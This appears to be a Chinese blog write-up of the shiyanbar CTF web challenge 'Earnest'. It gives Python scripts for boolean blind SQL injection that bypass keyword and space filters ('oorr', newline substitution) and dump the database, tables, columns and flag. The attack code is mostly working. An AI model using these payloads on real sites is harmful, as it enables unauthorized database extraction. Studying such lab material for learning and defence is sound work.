也可用bp进行爆破,这里用py脚本。

打看网页输入1,显示You are in,输入2,显示You are not in,是个布尔注入。

然后看看过滤了什么。

sql注入没有过滤:--+、or

sql注入过滤:union select、and、order by、空格

虽然or没有被当做sql注入处理,但是构造id=1'/**/or/**/1'='1--+时仍然是返回,You are not in。

所以应该是,or仍然被过滤,只是没有被当做sql注入,于是利用oorr来绕过。

下面给出爆破脚本:

1.暴库长

import requests

s='You are in'

url='http://ctf5.shiyanbar.com/web/earnest/index.php'

for i in range(30):

	key={'id':"0'oorr(length(database())=%s)oorr'0"%i}

	r=requests.post(url,data=key).text

	print(i)

	if s in r:

		print(i)

		break

结果是18.

2.爆库名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'

p='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'

s='You are in'

database=''

for i in range(19):

	for j in p:

		key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}

		r=requests.post(url,data=key).text

		if s in r:

			database+=j

			print(database)

			break

print('answer is:')

print(database)

结果是:ctf_sql_bool_blind

3.爆表长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'

s='You are in'

i=1

while True:

	pay="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i

	pay=pay.replace(' ',chr(0x0a))

	key={'id':pay}

	r=requests.post(url,data=key).text

	print(key)

	if s in r:

		print(i)

		break

	i+=1

结果是:11

4.爆表名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'

guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'

s='You are in'

tables=''

for i in range(12):

	for j in guess:

		flag="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)

		#flag="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)

		flag=flag.replace(' ',chr(0x0a))

		pay={'id':flag}

		r=requests.post(url,data=pay).text

		print(pay)

		if s in r:

			tables+=j

			print(j)

			break

print (tables)

结果是:fiag@users

显然我们需要的是fiag。

5.爆列长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'

guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'

s='You are in'

i=1

while True:

	flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i

	flag=flag.replace(' ',chr(0x0a))

	pay={'id':flag}

	r=requests.post(url,data=pay).text

	print(pay)

	if s in r:

		print(i)

		break

	i+=1

结果是:6

6.爆列名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'

guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'

s='You are in'

columns=''

for i in range(1,7):

	for j in guess:

		flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)

		#flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)

		flag=flag.replace(' ',chr(0x0a))

		pay={'id':flag}

		r=requests.post(url,data=pay).text

		print(pay)

		if s in r:

			columns+=j

			print(j)

			break

print(columns)

结果是:fl$4g

7.爆字段长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'

guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'

s='You are in'

i=1

while True:

	pay={'id':"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i}

	r=requests.post(url,data=pay).text

	print(pay)

	if s in r:

		print(i)

		break

	i+=1

结果是13

8.爆字段

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'

guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'

s='You are in'

dump=''

for i in range(1,15):

	for j in guess:

		pay={'id':"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)}

		r=requests.post(url,data=pay).text

		print(pay)

		if s in r:

			dump+=j

			print(j)

			break

print(dump)

结果竟然是flag{haha~you。

蒙圈,看了大佬的wp才知道,原来第十四位是‘ ’,不过估计后面的内容也不长,于是改个数字继续跑就跑出结果了。

实验吧web-难-认真一点!(布尔盲注,py脚本)的更多相关文章

  1. python dvwa布尔盲注自动化脚本(level=low)

    仅供学习代码参考 1#python dvwa布尔盲注自动化脚本 2 import requests 3 import string 4 import time 5 INIT_URL="htt ...

  2. sqli-labs第5关布尔盲注pyhton脚本

    import requests import os #此函数先判断数据库长度 def length(url,str): num = 1 while True: str_num = '%d' %num ...

  3. WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注

    1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...

  4. WEB新手之布尔盲注

    开始写SQL的题,单引号等特殊符号闭合漏洞比较简单,因此从Less-5开始写. 布尔盲注是多种盲注的一种,这种盲注方法也比较好理解.但使用这种盲注有一个前提,就是网页会有回显,透过这个回显,我们可以通 ...

  5. sqli-labs lesson5-6 布尔盲注 报错注入 延时注入

    LESSON 5: 典型的布尔盲注. 盲注:sql注入过程中,sql语句的执行结果不回显到前端,这个时候就只能用一些别的方法进行判断或者尝试,这个判断或者尝试就叫做盲注.盲注又分为:1.基于布尔SQL ...

  6. SQL注入之Sqli-labs系列第八篇(基于布尔盲注的注入)

    开始挑战第八关(Blind- Boolian- Single Quotes- String) 这关首先需要用到以下函数: 开始测试,使用测试语句,利用单引号进行闭合 猜解字段 union select ...

  7. 渗透测试初学者的靶场实战 1--墨者学院SQL注入—布尔盲注

    前言 大家好,我是一个渗透测试的爱好者和初学者,从事网络安全相关工作,由于爱好网上和朋友处找了好多关于渗透的视频.工具等资料,然后自己找了一个靶场,想把自己练习的体会和过程分享出来,希望能对其他渗透爱 ...

  8. sql布尔盲注和时间盲注的二分脚本

    布尔盲注: import requests url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/" ...

  9. sqli-labs less8-10(布尔盲注时间盲注)

    less-8 布尔盲注 首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹.然后进行盲注. 盲注思路: 破解当前数据库名: and len ...

  10. sqli-labs lesson 7-10 (文件导出,布尔盲注,延时注入)

    写在前面: 首先需要更改一下数据库用户的权限用于我们之后的操作. 首先在mysql命令行中用show variables like '%secure%';查看 secure-file-priv 当前的 ...

随机推荐

  1. 创建Git本地仓库

    一.获取Git仓库 安装好Git后即可创建Git本地仓库,开始项目的版本管理.有两种方法取得Git项目仓库:1.在现有项目或目录下导入所有文件到Git中:2.从一个服务器克隆一个现有的Git仓库. 1 ...

  2. vue 使用 element-ui 时报错ERROR in ./node_modules/element-ui/lib/theme-chalk/fonts/element-icons.ttf

    在vue项目中引用 element-ui 时,虽然按照 element-ui 的官方文档一步步操作,还是产生了下面的错误 解决这个问题的方法,就是在  web pack.config.js  文件中进 ...

  3. zabbix监控memcached服务

    zabbix监控memcached服务 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 一.安装并配置memcached服务 1>.使用yum方式安装memcached [ro ...

  4. dMd----攻防世界

    首先在Linux上查看题目,没有什么发现elf文件,之后使用ida打开看看,找到main函数,f5查看, 上图一些字符是char过的,便于查看,发现是一个if else语句,先经过了MD5加密然后判断 ...

  5. JS 判断是否为安卓或IOS系统

    其实很简单,代码如下<script type="text/javascript"> var device = navigator.userAgent; || devic ...

  6. Apache http 包中的常量

    org.apache.* org.apache.http.Consts public static final int CR 13 public static final int HT 9 publi ...

  7. 值得一学的C语言

    P1085 不高兴的津津 #include <stdio.h> int main( ) { int a,b; int max=0; int result; for (int i = 0; ...

  8. 033.SAP上查看IDOC接口,PI接口查不到的日志记录,可能在IDOC接口日志里面

    01. SAP系统发料之后,数据没有传输到条码系统,同事也没有任何bc01的日志,这是就要考虑是不是在IDOC接口了,输入事务代码WE02或者WE05 02.双击查看内容 03.点开就能看到详细内容了 ...

  9. pyhton中pandas数据分析模块快速入门(非常容易懂)

    //2019.07.16python中pandas模块应用1.pandas是python进行数据分析的数据分析库,它提供了对于大量数据进行分析的函数库和各种方法,它的官网是http://pandas. ...

  10. MFC 状态栏的使用 CstatusBar

    你在源文件头文件声明一下 CStatusBar   zhuangtailan; 然后在窗口初始化添加以下代码 zhuangtailan.Create(this);//意思是在本窗口创建 UINT id ...